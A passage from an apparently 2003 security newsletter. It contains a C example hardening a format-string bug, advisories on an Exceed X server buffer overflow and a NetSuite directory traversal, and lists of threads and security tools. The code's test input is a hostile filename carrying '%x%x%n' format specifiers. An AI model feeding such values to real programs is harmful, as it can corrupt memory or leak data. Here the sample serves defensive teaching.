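 * corruption in the advisory comes from.
 */

/* Hardened form: the format is a compile-time literal and the filename is
 * passed purely as data, so its '%' characters are copied, never interpreted.
 * Returns what snprintf returns (the length that was or would be written). */
int report_filename(char *out, size_t outsz, const char *filename)
{
    return snprintf(out, outsz, "cannot open image: %s", filename);
}

/* Some programs build a format string at run time (a configurable message
 * template, say). If a filename must be spliced into such a template, every
 * '%' has to be doubled first. Returns false when out cannot hold the result. */
bool escape_percent(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (; *in; in++) {
        size_t need = (*in == '%') ? 2 : 1;
        if (o + need >= outsz)           /* keep room for the terminating NUL */
            return false;
        out[o++] = *in;
        if (*in == '%')
            out[o++] = '%';
    }
    out[o] = '\0';
    return true;
}

/* Cheap triage check for a wrapper or mail client: does this name carry
 * anything a printf-family function would interpret? A legitimate image name
 * almost never contains '%', so flagging it for review costs little. */
bool filename_has_format_specifiers(const char *filename)
{
    return strchr(filename, '%') != NULL;
}

int main(void)
{
    const char *hostile = "photo%x%x%n.png";   /* constructed sample name */

    report_filename(g_msg, sizeof g_msg, hostile);
    puts(g_msg);                                 /* the %x and %n print literally */

    if (escape_percent(hostile, g_escaped, sizeof g_escaped))
        puts(g_escaped);                         /* photo%%x%%x%%n.png */

    printf("needs attention: %s\n",
           filename_has_format_specifiers(hostile) ? "yes" : "no");
    return 0;
}
```

The two rules the block embodies are the ones that close this class entirely: format strings are literals, and anything user-derived travels through a conversion such as `%s`. The `escape_percent` path exists only for code that cannot follow the first rule; it is a fallback, not the preferred design.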
14. Exceed Font Name Handler Buffer Overflow Vulnerability
BugTraq ID: 8194
Remote: Yes
Date Published: Jul 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8194
Summary:
The Exceed X server is an X Windows server for Microsoft Windows systems.
The server listens for connections on port 6000. Exceed client software is
then used to connect to the Exceed X server.
The Exceed server and client have been reported prone to a remotely
triggered buffer overflow vulnerability. An attacker may trigger this
vulnerability by sending >=6001 bytes of data as a font name to the server
via an XLoadQueryFont() request, or by passing a malicious font name from
the server to the client in a manner sufficient to trigger the overflow.
When the vulnerable software handles this request it will crash.
The issue is likely due to a lack of sufficient bounds checking performed
on font name data before it is copied into a reserved memory buffer. If
the supplied data exceeds the size of the reserved buffer, excessive data
may overrun the bounds of the buffer and corrupt adjacent memory space. In
this instance, it has been reported that adjacent memory contains a saved
instruction pointer. Because the attacker has the ability to influence
program execution flow, it may be possible to supply and execute arbitrary
code. This however has not been confirmed.
It has been demonstrated that this vulnerability may be exploited to
trigger a denial of service condition; although unconfirmed, code
execution may also be possible.
15. NetSuite HTTP Server Directory Traversal Vulnerability
BugTraq ID: 8197
Remote: Yes
Date Published: Jul 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8197
Summary:
NetSuite is a simple SMTP and HTTP/CGI server for Microsoft Windows based
systems.
The HTTP component of NetSuite has been reported prone to a directory
traversal vulnerability.
Various combinations of encoded directory traversal sequences may be used
to break out of the web root directory. Attackers may gain access to files
that are readable by the web server as a result.
Successful exploitation may expose sensitive information to remote
attackers. This information could be used to aid in further attacks that
attempt to compromise the host.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329280
2. CA-SSL in IIS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329281
3. AW: Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329276
4. CIFS Security (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329101
5. SecurityFocus Microsoft Newsletter #145 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328997
6. FW: Keyboard Locking/Invisible Screensaver (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328911
7. investigating misuse of the internet (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328725
8. How to generate list of patches installed? (long) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328724
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Primedius Personal Firewall/Anti-Spy ware
by Primedius
Platforms: Windows 2000, Windows XP
Relevant URL:
http://www.primedius.com/PersonalFirewall.htm
Summary:
Primedius Personal Firewall/Anti-Spy ware prevents intrusions and stops
unwanted entries to and communications from your computer. Other features
include detecting, reviewing and screening any entry through the Winsock layer.
2. F-Secure Internet Security 2003
by F-Secure Corporation
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.f-secure.com/estore/fsis2003.shtml
Summary:
F-Secure Internet Security 2003 includes an award winning antivirus
software, as well as an easy-to-use personal firewall product that
protects your system against break-in attempts when you are connected to
the Internet.
3. Steganos Security Suite 5
by Steganos
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.steganos.com/en/sss/index.htm
Summary:
A complete, easy-to-use security package that encrypts and conceals your
data. The Steganos Safe is a secure hard drive, which disappears at the
click of a button. Thanks to on-the-fly-encryption, 1 GB of data can be
encrypted in less than a second. Create encrypted e-mail attachments.
Includes Internet Trace Destructor, file shredder, e-mail encryption,
password manager and computer locking.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
-------------------------------------
1. aNTG v1.0
by Lucas
Relevant URL:
http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.
2. LibTomMath v0.23
by Tom St Denis tomstdenis (at) iahu (dot) ca
Relevant URL:
http://math.libtomcrypt.org/
Platforms: Linux, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows
XP
Summary:
LibTomMath provides highly optimized and portable routines for a vast
majority of integer-based number theoretic applications (including public
key cryptography).
3. Darik's Boot and Nuke v1.0.1
by Darik Horn
Relevant URL:
http://dban.sourceforge.net/
Platforms: Os Independent
Summary:
Darik's Boot and Nuke (DBAN) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and
completely delete the contents of any hard disk that it can detect, which
makes it an appropriate utility for bulk or emergency data destruction.
VI. SPONSOR INFORMATION
-----------------------